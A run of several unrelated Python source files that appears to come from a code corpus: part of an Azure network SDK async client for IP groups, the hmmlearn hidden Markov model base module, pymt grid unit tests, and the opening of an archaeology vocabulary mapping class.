ip_groups_name=ip_groups_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.IpGroupListResult"]:
"""Gets all IpGroups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IpGroupListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_12_01.models.IpGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('IpGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.IpGroupListResult"]:
"""Gets all IpGroups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IpGroupListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_12_01.models.IpGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('IpGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ipGroups'} # type: ignore
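# Illustrative sketch (not generated code): reaching this operations group
# through the service client. The aio ``NetworkManagementClient`` import path,
# the ``ip_groups`` attribute name and the ``IpGroup`` model fields used below
# are assumptions based on the surrounding package layout.
async def _example_create_and_list_ip_groups(credential, subscription_id: str, resource_group: str):
    from azure.mgmt.network.v2019_12_01.aio import NetworkManagementClient
    from azure.mgmt.network.v2019_12_01.models import IpGroup
    async with NetworkManagementClient(credential, subscription_id) as client:
        poller = await client.ip_groups.begin_create_or_update(
            resource_group,
            "sample-ip-group",
            IpGroup(location="westus", ip_addresses=["10.0.0.0/24"]),
        )
        created = await poller.result()  # resolves once the long-running operation finishes
        names = [group.name async for group in client.ip_groups.list_by_resource_group(resource_group)]
        return created, names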
| mit | -2,391,779,252,557,074,000 | 48.266304 | 186 | 0.639272 | false |
aubreyli/hmmlearn | hmmlearn/base.py | 1 | 23398 | from __future__ import print_function
import string
import sys
from collections import deque
import numpy as np
from scipy.misc import logsumexp
from sklearn.base import BaseEstimator, _pprint
from sklearn.utils import check_array, check_random_state
from sklearn.utils.validation import check_is_fitted
from . import _hmmc
from .utils import normalize, log_normalize, iter_from_X_lengths, log_mask_zero
#: Supported decoder algorithms.
DECODER_ALGORITHMS = frozenset(("viterbi", "map"))
class ConvergenceMonitor(object):
"""Monitors and reports convergence to :data:`sys.stderr`.
Parameters
----------
tol : double
Convergence threshold. EM has converged either if the maximum
number of iterations is reached or the log probability
improvement between the two consecutive iterations is less
than threshold.
n_iter : int
Maximum number of iterations to perform.
verbose : bool
If ``True`` then per-iteration convergence reports are printed,
otherwise the monitor is mute.
Attributes
----------
history : deque
The log probability of the data for the last two training
iterations. If the values are not strictly increasing, the
model did not converge.
iter : int
Number of iterations performed while training the model.
"""
_template = "{iter:>10d} {logprob:>16.4f} {delta:>+16.4f}"
def __init__(self, tol, n_iter, verbose):
self.tol = tol
self.n_iter = n_iter
self.verbose = verbose
self.history = deque(maxlen=2)
self.iter = 0
def __repr__(self):
class_name = self.__class__.__name__
params = dict(vars(self), history=list(self.history))
return "{0}({1})".format(
class_name, _pprint(params, offset=len(class_name)))
def report(self, logprob):
"""Reports convergence to :data:`sys.stderr`.
The output consists of three columns: iteration number, log
probability of the data at the current iteration and convergence
rate. At the first iteration convergence rate is unknown and
is thus denoted by NaN.
Parameters
----------
logprob : float
The log probability of the data as computed by EM algorithm
in the current iteration.
"""
if self.verbose:
delta = logprob - self.history[-1] if self.history else np.nan
message = self._template.format(
iter=self.iter + 1, logprob=logprob, delta=delta)
print(message, file=sys.stderr)
self.history.append(logprob)
self.iter += 1
@property
def converged(self):
"""``True`` if the EM algorithm converged and ``False`` otherwise."""
# XXX we might want to check that ``logprob`` is non-decreasing.
return (self.iter == self.n_iter or
(len(self.history) == 2 and
self.history[1] - self.history[0] < self.tol))
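# Illustrative sketch (not part of the original module): how the monitor is
# driven inside an EM loop. The log-probability values below are made up.
def _example_monitor_usage():
    monitor = ConvergenceMonitor(tol=1e-2, n_iter=10, verbose=False)
    for logprob in (-120.0, -100.5, -100.495):  # pretend per-iteration scores
        monitor.report(logprob)
        if monitor.converged:                   # gain fell below ``tol``
            break
    return monitor.iter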
class _BaseHMM(BaseEstimator):
"""Base class for Hidden Markov Models.
This class allows for easy evaluation of, sampling from, and
maximum-likelihood estimation of the parameters of a HMM.
See the instance documentation for details specific to a
particular object.
Parameters
----------
n_components : int
Number of states in the model.
startprob_prior : array, shape (n_components, )
Initial state occupation prior distribution.
transmat_prior : array, shape (n_components, n_components)
Matrix of prior transition probabilities between states.
algorithm : string
Decoder algorithm. Must be one of "viterbi" or "map".
Defaults to "viterbi".
random_state: RandomState or an int seed
A random number generator instance.
n_iter : int, optional
Maximum number of iterations to perform.
tol : float, optional
Convergence threshold. EM will stop if the gain in log-likelihood
is below this value.
verbose : bool, optional
When ``True`` per-iteration convergence reports are printed
to :data:`sys.stderr`. You can diagnose convergence via the
:attr:`monitor_` attribute.
params : string, optional
Controls which parameters are updated in the training
process. Can contain any combination of 's' for startprob,
't' for transmat, and other characters for subclass-specific
emission parameters. Defaults to all parameters.
init_params : string, optional
Controls which parameters are initialized prior to
training. Can contain any combination of 's' for
startprob, 't' for transmat, and other characters for
subclass-specific emission parameters. Defaults to all
parameters.
Attributes
----------
monitor\_ : ConvergenceMonitor
Monitor object used to check the convergence of EM.
startprob\_ : array, shape (n_components, )
Initial state occupation distribution.
transmat\_ : array, shape (n_components, n_components)
Matrix of transition probabilities between states.
"""
def __init__(self, n_components=1,
startprob_prior=1.0, transmat_prior=1.0,
algorithm="viterbi", random_state=None,
n_iter=10, tol=1e-2, verbose=False,
params=string.ascii_letters,
init_params=string.ascii_letters):
self.n_components = n_components
self.params = params
self.init_params = init_params
self.startprob_prior = startprob_prior
self.transmat_prior = transmat_prior
self.algorithm = algorithm
self.random_state = random_state
self.n_iter = n_iter
self.tol = tol
self.verbose = verbose
def score_samples(self, X, lengths=None):
"""Compute the log probability under the model and compute posteriors.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
logprob : float
Log likelihood of ``X``.
posteriors : array, shape (n_samples, n_components)
State-membership probabilities for each sample in ``X``.
See Also
--------
score : Compute the log probability under the model.
decode : Find most likely state sequence corresponding to ``X``.
"""
check_is_fitted(self, "startprob_")
self._check()
X = check_array(X)
n_samples = X.shape[0]
logprob = 0
posteriors = np.zeros((n_samples, self.n_components))
for i, j in iter_from_X_lengths(X, lengths):
framelogprob = self._compute_log_likelihood(X[i:j])
logprobij, fwdlattice = self._do_forward_pass(framelogprob)
logprob += logprobij
bwdlattice = self._do_backward_pass(framelogprob)
posteriors[i:j] = self._compute_posteriors(fwdlattice, bwdlattice)
return logprob, posteriors
def score(self, X, lengths=None):
"""Compute the log probability under the model.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
logprob : float
Log likelihood of ``X``.
See Also
--------
score_samples : Compute the log probability under the model and
posteriors.
decode : Find most likely state sequence corresponding to ``X``.
"""
check_is_fitted(self, "startprob_")
self._check()
X = check_array(X)
# XXX we can unroll forward pass for speed and memory efficiency.
logprob = 0
for i, j in iter_from_X_lengths(X, lengths):
framelogprob = self._compute_log_likelihood(X[i:j])
logprobij, _fwdlattice = self._do_forward_pass(framelogprob)
logprob += logprobij
return logprob
def _decode_viterbi(self, X):
framelogprob = self._compute_log_likelihood(X)
return self._do_viterbi_pass(framelogprob)
def _decode_map(self, X):
_, posteriors = self.score_samples(X)
logprob = np.max(posteriors, axis=1).sum()
state_sequence = np.argmax(posteriors, axis=1)
return logprob, state_sequence
def decode(self, X, lengths=None, algorithm=None):
"""Find most likely state sequence corresponding to ``X``.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
algorithm : string
Decoder algorithm. Must be one of "viterbi" or "map".
If not given, :attr:`decoder` is used.
Returns
-------
logprob : float
Log probability of the produced state sequence.
state_sequence : array, shape (n_samples, )
Labels for each sample from ``X`` obtained via a given
decoder ``algorithm``.
See Also
--------
score_samples : Compute the log probability under the model and
posteriors.
score : Compute the log probability under the model.
"""
check_is_fitted(self, "startprob_")
self._check()
algorithm = algorithm or self.algorithm
if algorithm not in DECODER_ALGORITHMS:
raise ValueError("Unknown decoder {0!r}".format(algorithm))
decoder = {
"viterbi": self._decode_viterbi,
"map": self._decode_map
}[algorithm]
X = check_array(X)
n_samples = X.shape[0]
logprob = 0
state_sequence = np.empty(n_samples, dtype=int)
for i, j in iter_from_X_lengths(X, lengths):
# XXX decoder works on a single sample at a time!
logprobij, state_sequenceij = decoder(X[i:j])
logprob += logprobij
state_sequence[i:j] = state_sequenceij
return logprob, state_sequence
def predict(self, X, lengths=None):
"""Find most likely state sequence corresponding to ``X``.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
state_sequence : array, shape (n_samples, )
Labels for each sample from ``X``.
"""
_, state_sequence = self.decode(X, lengths)
return state_sequence
def predict_proba(self, X, lengths=None):
"""Compute the posterior probability for each state in the model.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
posteriors : array, shape (n_samples, n_components)
State-membership probabilities for each sample from ``X``.
"""
_, posteriors = self.score_samples(X, lengths)
return posteriors
def sample(self, n_samples=1, random_state=None):
"""Generate random samples from the model.
Parameters
----------
n_samples : int
Number of samples to generate.
random_state : RandomState or an int seed
A random number generator instance. If ``None``, the object's
``random_state`` is used.
Returns
-------
X : array, shape (n_samples, n_features)
Feature matrix.
state_sequence : array, shape (n_samples, )
State sequence produced by the model.
"""
check_is_fitted(self, "startprob_")
if random_state is None:
random_state = self.random_state
random_state = check_random_state(random_state)
startprob_cdf = np.cumsum(self.startprob_)
transmat_cdf = np.cumsum(self.transmat_, axis=1)
currstate = (startprob_cdf > random_state.rand()).argmax()
state_sequence = [currstate]
X = [self._generate_sample_from_state(
currstate, random_state=random_state)]
for t in range(n_samples - 1):
currstate = (transmat_cdf[currstate] > random_state.rand()) \
.argmax()
state_sequence.append(currstate)
X.append(self._generate_sample_from_state(
currstate, random_state=random_state))
return np.atleast_2d(X), np.array(state_sequence, dtype=int)
def fit(self, X, lengths=None):
"""Estimate model parameters.
An initialization step is performed before entering the
EM algorithm. If you want to avoid this step for a subset of
the parameters, pass proper ``init_params`` keyword argument
to estimator's constructor.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, )
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
self : object
Returns self.
"""
X = check_array(X)
self._init(X, lengths=lengths)
self._check()
self.monitor_ = ConvergenceMonitor(self.tol, self.n_iter, self.verbose)
for iter in range(self.n_iter):
stats = self._initialize_sufficient_statistics()
curr_logprob = 0
for i, j in iter_from_X_lengths(X, lengths):
framelogprob = self._compute_log_likelihood(X[i:j])
logprob, fwdlattice = self._do_forward_pass(framelogprob)
curr_logprob += logprob
bwdlattice = self._do_backward_pass(framelogprob)
posteriors = self._compute_posteriors(fwdlattice, bwdlattice)
self._accumulate_sufficient_statistics(
stats, X[i:j], framelogprob, posteriors, fwdlattice,
bwdlattice)
# XXX must be before convergence check, because otherwise
# there won't be any updates for the case ``n_iter=1``.
self._do_mstep(stats)
self.monitor_.report(curr_logprob)
if self.monitor_.converged:
break
return self
def _do_viterbi_pass(self, framelogprob):
n_samples, n_components = framelogprob.shape
state_sequence, logprob = _hmmc._viterbi(
n_samples, n_components, log_mask_zero(self.startprob_),
log_mask_zero(self.transmat_), framelogprob)
return logprob, state_sequence
def _do_forward_pass(self, framelogprob):
n_samples, n_components = framelogprob.shape
fwdlattice = np.zeros((n_samples, n_components))
_hmmc._forward(n_samples, n_components,
log_mask_zero(self.startprob_),
log_mask_zero(self.transmat_),
framelogprob, fwdlattice)
return logsumexp(fwdlattice[-1]), fwdlattice
def _do_backward_pass(self, framelogprob):
n_samples, n_components = framelogprob.shape
bwdlattice = np.zeros((n_samples, n_components))
_hmmc._backward(n_samples, n_components,
log_mask_zero(self.startprob_),
log_mask_zero(self.transmat_),
framelogprob, bwdlattice)
return bwdlattice
def _compute_posteriors(self, fwdlattice, bwdlattice):
# gamma is guaranteed to be correctly normalized by logprob at
# all frames, unless we do approximate inference using pruning.
# So, we will normalize each frame explicitly in case we
# pruned too aggressively.
log_gamma = fwdlattice + bwdlattice
log_normalize(log_gamma, axis=1)
return np.exp(log_gamma)
def _init(self, X, lengths):
"""Initializes model parameters prior to fitting.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, )
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
"""
init = 1. / self.n_components
if 's' in self.init_params or not hasattr(self, "startprob_"):
self.startprob_ = np.full(self.n_components, init)
if 't' in self.init_params or not hasattr(self, "transmat_"):
self.transmat_ = np.full((self.n_components, self.n_components),
init)
def _check(self):
"""Validates model parameters prior to fitting.
Raises
------
ValueError
If any of the parameters are invalid, e.g. if :attr:`startprob_`
don't sum to 1.
"""
self.startprob_ = np.asarray(self.startprob_)
if len(self.startprob_) != self.n_components:
raise ValueError("startprob_ must have length n_components")
if not np.allclose(self.startprob_.sum(), 1.0):
raise ValueError("startprob_ must sum to 1.0 (got {0:.4f})"
.format(self.startprob_.sum()))
self.transmat_ = np.asarray(self.transmat_)
if self.transmat_.shape != (self.n_components, self.n_components):
raise ValueError(
"transmat_ must have shape (n_components, n_components)")
if not np.allclose(self.transmat_.sum(axis=1), 1.0):
raise ValueError("rows of transmat_ must sum to 1.0 (got {0})"
.format(self.transmat_.sum(axis=1)))
def _compute_log_likelihood(self, X):
"""Computes per-component log probability under the model.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
Returns
-------
logprob : array, shape (n_samples, n_components)
Log probability of each sample in ``X`` for each of the
model states.
"""
def _generate_sample_from_state(self, state, random_state=None):
"""Generates a random sample from a given component.
Parameters
----------
state : int
Index of the component to condition on.
random_state: RandomState or an int seed
A random number generator instance. If ``None``, the object's
``random_state`` is used.
Returns
-------
X : array, shape (n_features, )
A random sample from the emission distribution corresponding
to a given component.
"""
# Methods used by self.fit()
def _initialize_sufficient_statistics(self):
"""Initializes sufficient statistics required for M-step.
The method is *pure*, meaning that it doesn't change the state of
the instance. For extensibility computed statistics are stored
in a dictionary.
Returns
-------
nobs : int
Number of samples in the data.
start : array, shape (n_components, )
An array where the i-th element corresponds to the posterior
probability of the first sample being generated by the i-th
state.
trans : array, shape (n_components, n_components)
An array where the (i, j)-th element corresponds to the
posterior probability of transitioning between the i-th to j-th
states.
"""
stats = {'nobs': 0,
'start': np.zeros(self.n_components),
'trans': np.zeros((self.n_components, self.n_components))}
return stats
def _accumulate_sufficient_statistics(self, stats, X, framelogprob,
posteriors, fwdlattice, bwdlattice):
"""Updates sufficient statistics from a given sample.
Parameters
----------
stats : dict
Sufficient statistics as returned by
:meth:`~base._BaseHMM._initialize_sufficient_statistics`.
X : array, shape (n_samples, n_features)
Sample sequence.
framelogprob : array, shape (n_samples, n_components)
Log-probabilities of each sample under each of the model states.
posteriors : array, shape (n_samples, n_components)
Posterior probabilities of each sample being generated by each
of the model states.
fwdlattice, bwdlattice : array, shape (n_samples, n_components)
Log-forward and log-backward probabilities.
"""
stats['nobs'] += 1
if 's' in self.params:
stats['start'] += posteriors[0]
if 't' in self.params:
n_samples, n_components = framelogprob.shape
# when the sample is of length 1, it contains no transitions
# so there is no reason to update our trans. matrix estimate
if n_samples <= 1:
return
lneta = np.zeros((n_samples - 1, n_components, n_components))
_hmmc._compute_lneta(n_samples, n_components, fwdlattice,
log_mask_zero(self.transmat_),
bwdlattice, framelogprob, lneta)
stats['trans'] += np.exp(logsumexp(lneta, axis=0))
def _do_mstep(self, stats):
"""Performs the M-step of EM algorithm.
Parameters
----------
stats : dict
Sufficient statistics updated from all available samples.
"""
# The ``np.where`` calls guard against updating forbidden states
# or transitions in e.g. a left-right HMM.
if 's' in self.params:
startprob_ = self.startprob_prior - 1.0 + stats['start']
self.startprob_ = np.where(self.startprob_ == 0.0,
self.startprob_, startprob_)
normalize(self.startprob_)
if 't' in self.params:
transmat_ = self.transmat_prior - 1.0 + stats['trans']
self.transmat_ = np.where(self.transmat_ == 0.0,
self.transmat_, transmat_)
normalize(self.transmat_, axis=1)
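# --- Illustrative sketch (not part of the original module) -------------------
# The two hooks documented above, ``_compute_log_likelihood`` and
# ``_generate_sample_from_state``, are meant to be supplied by concrete
# emission models.  The helpers below only illustrate the expected array
# shapes for a hypothetical spherical unit-variance Gaussian emission;
# ``means`` with shape (n_components, n_features) is an assumed example
# parameter, not part of this module.
def _example_log_likelihood(X, means):
    """Per-component log density of each sample -> (n_samples, n_components)."""
    d2 = ((X[:, None, :] - means[None, :, :]) ** 2).sum(axis=-1)
    return -0.5 * (d2 + X.shape[1] * np.log(2 * np.pi))
def _example_sample_from_state(state, means, random_state=None):
    """One draw from the emission of component ``state`` -> (n_features, )."""
    rng = np.random.RandomState(random_state)
    return means[state] + rng.standard_normal(means.shape[1])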
| bsd-3-clause | 8,770,974,257,951,624,000 | 35.163833 | 79 | 0.588298 | false |
csdms/pymt | tests/framework/test_bmi_ugrid.py | 1 | 5477 | """Unit tests for the pymt.framwork.bmi_ugrid module."""
import numpy as np
import xarray as xr
from pymt.framework.bmi_ugrid import (
Points,
Rectilinear,
Scalar,
StructuredQuadrilateral,
UniformRectilinear,
Unstructured,
Vector,
)
grid_id = 0
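# Each Bmi* class below is a minimal stand-in implementing only the BMI grid
# methods the corresponding bmi_ugrid class needs; the tests then check that
# an xarray.Dataset is built from it with the expected rank, metadata and
# coordinate arrays.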
class BmiScalar:
def grid_type(self, grid_id):
return "scalar"
def grid_ndim(self, grid_id):
return 0
def test_scalar_grid():
"""Test creating a scalar grid."""
bmi = BmiScalar()
grid = Scalar(bmi, grid_id)
assert grid.ndim == 0
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert isinstance(grid, xr.Dataset)
class BmiVector:
def grid_type(self, grid_id):
return "vector"
def grid_ndim(self, grid_id):
return 1
def test_vector_grid():
"""Test creating a vector grid."""
bmi = BmiVector()
grid = Vector(bmi, grid_id)
assert grid.ndim == 1
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert isinstance(grid, xr.Dataset)
class BmiPoints:
x = np.array([0.0, 1.0, 0.0, 1.0])
y = np.array([0.0, 0.0, 1.0, 1.0])
def grid_type(self, grid_id):
return "points"
def grid_ndim(self, grid_id):
return 2
def grid_x(self, grid_id, out=None):
return self.x.flatten()
def grid_y(self, grid_id, out=None):
return self.y.flatten()
def test_points_grid():
"""Test creating a grid from points."""
bmi = BmiPoints()
grid = Points(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
class BmiUnstructured(BmiPoints):
def grid_type(self, grid_id):
return "unstructured"
def grid_nodes_per_face(self, grid_id, out=None):
return 4
def grid_face_nodes(self, grid_id, out=None):
return np.array([0, 1, 3, 2])
def grid_face_node_offset(self, grid_id, out=None):
nodes_per_face = self.grid_nodes_per_face(grid_id)
return np.cumsum(nodes_per_face)
def test_unstructured_grid():
"""Test creating an unstructured grid."""
bmi = BmiUnstructured()
grid = Unstructured(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
class BmiStructuredQuadrilateral:
x = np.array([[0.0, 3.0], [1.0, 4.0], [2.0, 5.0]])
y = np.array([[0.0, 1.0], [2.0, 3.0], [4.0, 5.0]])
def grid_type(self, grid_id):
return "structured_quadrilateral"
def grid_ndim(self, grid_id):
return self.x.ndim
def grid_shape(self, grid_id, out=None):
return np.array(self.x.shape)
def grid_x(self, grid_id, out=None):
return self.x.flatten()
def grid_y(self, grid_id, out=None):
return self.y.flatten()
def test_structured_quadrilateral_grid():
"""Test creating a structured quadrilateral grid."""
bmi = BmiStructuredQuadrilateral()
grid = StructuredQuadrilateral(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
class BmiRectilinear:
x = np.array([1, 4, 8])
y = np.array([0, 1, 2, 3])
shape = (len(y), len(x))
def grid_type(self, grid_id):
return "rectilinear"
def grid_ndim(self, grid_id):
return len(self.shape)
def grid_shape(self, grid_id, out=None):
return np.array(self.shape)
def grid_x(self, grid_id, out=None):
return self.x
def grid_y(self, grid_id, out=None):
return self.y
def test_rectilinear_grid():
"""Test creating a rectilinear grid."""
bmi = BmiRectilinear()
grid = Rectilinear(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
class BmiUniformRectilinear:
shape = (4, 3)
spacing = (1.0, 1.0)
origin = (5.0, 2.0)
def grid_type(self, grid_id):
return "uniform_rectilinear"
def grid_ndim(self, grid_id):
return len(self.shape)
def grid_shape(self, grid_id, out=None):
return np.array(self.shape)
def grid_spacing(self, grid_id, out=None):
return np.array(self.spacing)
def grid_origin(self, grid_id, out=None):
return np.array(self.origin)
def test_uniform_rectilinear_grid():
"""Test creating a uniform rectilinear grid."""
bmi = BmiUniformRectilinear()
grid = UniformRectilinear(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
| mit | 6,848,835,167,351,887,000 | 24.957346 | 73 | 0.62516 | false |
wxwilcke/pakbon-ld | src/schema/vocab0102.py | 1 | 10112 | #!/usr/bin/python3
import rdflib
import helpFunctions as hf
import re
class Vocabulary0102:
def __init__(self, troot, namespace):
self.troot = troot
self.basens = namespace['base'] + '/voc/'
self.nss = namespace
self.ns = re.sub(r'(\{.*\})lookup', r'\1', troot.tag)
types = {'archistypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_type'),
'artefacttypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'complextypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'contexttypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'documenttypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'gemeenteCodelijst': rdflib.URIRef(self.nss['crm'] + 'E44_Place_Appellation'),
'grondspoortypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'hoogtemetingmethodeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'kaartbladCodelijst': rdflib.URIRef(self.nss['crm'] + 'E46_Section_Definition'),
'materiaalcategorieCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0030_ContextFindMaterial'),
                 'monstertypeCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0053_ContextSampleType'),
'objectrelatietypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'papierformaatCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0079_RecordDrawingNote'),
'periodeCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0091_Timestamp'),
'plaatsCodelijst': rdflib.URIRef(self.nss['crm'] + 'E44_Place_Appellation'),
'planumtypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'provincieCodelijst': rdflib.URIRef(self.nss['crm'] + 'E44_Place_Appellation'),
'structuurtypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'tekeningfototypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'uitvoerderCodelijst': rdflib.URIRef(self.nss['crm'] + 'E42_Identifier'),
'verwervingCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'verzamelwijzeCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0046_ContextNote'),
'waardetypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
